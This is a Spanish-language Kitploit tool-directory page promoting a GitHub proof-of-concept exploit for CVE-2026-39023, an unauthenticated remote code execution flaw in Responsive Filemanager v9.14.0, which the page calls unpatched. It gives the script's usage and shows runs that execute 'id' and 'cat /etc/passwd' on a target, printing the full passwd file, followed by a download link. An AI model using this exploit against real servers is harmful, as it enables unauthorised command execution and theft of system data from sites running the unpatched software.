Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39023 — RCE RESPONSIVE filemanager v.9.14.0 | Kitploit
Herramientas/GitHubGitHub/pierreadams/cve-2026-39023
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubpierreadams/cve-2026-39023

CVE-2026-39023

RCE RESPONSIVE filemanager v.9.14.0

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-39023

PoC de RCE - RESPONSIVE filemanager v.9.14.0 (última versión - sin parche)

Proyecto de Github : https://github.com/trippo/ResponsiveFilemanager

Requisitos: No se requiere nada, este exploit no está autenticado.

La aplicación Responsive Filemanager es una herramienta de gestión de archivos basada en web utilizada para manejar archivos en un servidor. Esta vulnerabilidad (CVE-2026-39023) permite a un atacante explotar un archivo duplicado para crear un archivo php, lo que lleva a la ejecución remota de código en el sistema objetivo. (https://www.cve.org/CVERecord/SearchResults?query=CVE-2026-39023)

Uso :

root@kitploit:~
$python3 POC_CVE-2026-39023.py -h
usage: POC_CVE-2026-39023.py [-h] [-C COOKIE] -c COMMAND -u URL

RCE Exploit RESPONSIVE filemanager CVE-2026-39023

options:
  -h, --help            show this help message and exit
  -C COOKIE, --cookie COOKIE
  -c COMMAND, --command COMMAND
  -u URL, --url URL
root@kitploit:~
$ python3 POC_CVE-2026-39023.py -c 'id' -u http://127.0.0.1:8080 
[>] Collecting cookie...
[>] Cookie collected: aaf4dc1d4ceadaaafd5436aa96afecef
[>] Creating file...
[>] File successfully saved
[>] Response:

uid=1000(application) gid=1000(application) groups=1000(application)

Puede especificar cookie :

root@kitploit:~
$ python3 POC_CVE-2026-39023.py -c 'cat /etc/passwd' -u http://127.0.0.1:8080 -C Cookie_Test
[>] Cookie : Cookie_Test
[>] Cookie collect : PHPSESSID=Cookie_Test
[>] Requets POST Send
[>] Payload send
[>] Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
application:x:1000:1000::/home/application:/bin/bash
blackfire:x:999:999::/dev/null:/bin/sh
postfix:x:101:104::/var/spool/postfix:/usr/sbin/nologin
Descargar herramienta